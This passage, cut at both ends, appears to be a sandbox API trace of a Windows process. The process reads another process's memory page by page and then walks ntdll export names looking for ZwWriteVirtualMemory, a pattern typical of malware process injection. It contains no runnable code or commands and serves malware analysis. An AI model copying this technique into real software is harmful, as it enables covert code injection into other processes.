NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2800000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2801000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2802000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78013000, Buffer=0x7ff9, BufferSize=0x2803000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78014000, Buffer=0x7ff9, BufferSize=0x2804000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78015000, Buffer=0x7ff9, BufferSize=0x2805000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78016000, Buffer=0x7ff9, BufferSize=0x2806000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78017000, Buffer=0x7ff9, BufferSize=0x2807000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.895] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78018000, Buffer=0x7ff9, BufferSize=0x2808000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78019000, Buffer=0x7ff9, BufferSize=0x2809000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801a000, Buffer=0x7ff9, BufferSize=0x280a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801b000, Buffer=0x7ff9, BufferSize=0x280b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801c000, Buffer=0x7ff9, BufferSize=0x280c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801d000, Buffer=0x7ff9, BufferSize=0x280d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801e000, Buffer=0x7ff9, BufferSize=0x280e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801f000, Buffer=0x7ff9, BufferSize=0x280f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78020000, Buffer=0x7ff9, BufferSize=0x2810000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78021000, Buffer=0x7ff9, BufferSize=0x2811000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78022000, Buffer=0x7ff9, BufferSize=0x2812000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.896] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78023000, Buffer=0x7ff9, BufferSize=0x2813000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.897] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78024000, Buffer=0x7ff9, BufferSize=0x2814000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.897] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78025000, Buffer=0x7ff9, BufferSize=0x2815000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.897] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78026000, Buffer=0x7ff9, BufferSize=0x2816000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.897] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78027000, Buffer=0x7ff9, BufferSize=0x2817000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.897] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78028000, Buffer=0x7ff9, BufferSize=0x2818000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.908] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwWriteVirtualMemory") returned -1 [0206.908] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgPrint", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0206.909] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwWriteVirtualMemory") returned -1 [0206.910] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0206.911] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="MD4Final", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="MD4Init", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="MD4Update", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="MD5Final", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="MD5Init", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="MD5Update", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwWriteVirtualMemory") returned -1 [0206.912] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0206.913] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwWriteVirtualMemory") returned -1 